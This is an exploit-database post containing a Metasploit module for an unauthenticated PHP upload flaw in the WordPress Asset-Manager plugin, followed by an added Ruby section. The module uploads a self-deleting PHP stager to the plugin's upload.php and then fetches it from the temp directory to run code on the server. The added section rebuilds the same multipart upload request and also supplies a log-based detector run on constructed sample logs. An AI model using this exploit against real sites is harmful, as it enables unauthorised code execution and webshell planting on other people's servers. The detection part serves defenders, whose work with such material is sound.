
WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the Asset-Manager WordPress plugin, version 2.0 and below. It allows PHP files to be uploaded: a user can upload a file to a temp directory without authentication, which leads to arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stager that writes the real payload, executes it and deletes itself
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Single multipart part named "Filedata", the field upload.php reads
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The plugin stores uploads under wp-content/uploads/assets/temp/
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
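As an added example (not part of the original post or of the Metasploit module), the block below reproduces in plain Ruby the request shape the module relies on, and then runs a small access-log check for the same two-step sequence: a POST to asset-manager/upload.php that returns 200, followed by a GET for a .php file under wp-content/uploads/assets/temp/ from the same client. The log lines are constructed for the example, and the helper names, the log format assumption (Apache/Nginx combined format) and the 300-second correlation window are my own choices.

```ruby
require 'securerandom'
require 'time'

# Hypothetical helper (not from the module): builds the multipart/form-data
# body that upload.php receives. The module does the same via Rex::MIME::Message;
# the single part is named "Filedata", which is the field upload.php reads.
def build_upload_body(filename, content, boundary = "----#{SecureRandom.hex(8)}")
  body = String.new
  body << "--#{boundary}\r\n"
  body << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{filename}\"\r\n"
  body << "Content-Type: application/octet-stream\r\n\r\n"
  body << content << "\r\n"
  body << "--#{boundary}--\r\n"
  body
end

# Combined access-log format (assumed): ip ident user [time] "METHOD path proto" status size ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+/

def parse_log_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip],
    time: Time.strptime(m[:time], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

UPLOAD_ENDPOINT = %r{/wp-content/plugins/asset-manager/upload\.php(\?|\z)}
TEMP_PHP        = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

# Flags every successful POST to the plugin's upload.php and, when the same
# client fetches a .php file from the temp directory within `window` seconds,
# records that path as the likely web shell (nil if no follow-up was seen).
def detect_asset_manager_upload(lines, window: 300)
  events = lines.map { |l| parse_log_line(l) }.compact
  alerts = []
  events.each_with_index do |ev, i|
    next unless ev[:method] == 'POST' && ev[:path] =~ UPLOAD_ENDPOINT && ev[:status] == 200
    follow = events[(i + 1)..-1].find do |e|
      e[:ip] == ev[:ip] && e[:method] == 'GET' && e[:path] =~ TEMP_PHP &&
        (e[:time] - ev[:time]).between?(0, window)
    end
    alerts << { ip: ev[:ip], upload_at: ev[:time], shell: follow && follow[:path] }
  end
  alerts
end

# Constructed sample log (not real traffic): one exploit sequence from
# 203.0.113.7 and one attempt from 198.51.100.9 that the server rejected.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:22:33 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:40 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:22:41 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzrt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:30:00 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 210 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:30:05 +0800] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 404 170 "-" "Mozilla/5.0"
LOG

if __FILE__ == $PROGRAM_NAME
  detect_asset_manager_upload(SAMPLE_LOG.lines).each do |a|
    puts "#{a[:ip]} uploaded at #{a[:upload_at]}; shell fetched: #{a[:shell] || 'not seen'}"
  end
end
```

A 200 on the upload with no matching GET still deserves an alert: the module only reports "Execution failed" when the follow-up GET is not 200, so a web server that refuses to execute PHP under wp-content/uploads stops the second step but not the first, and the dropped file is still on disk in the temp directory.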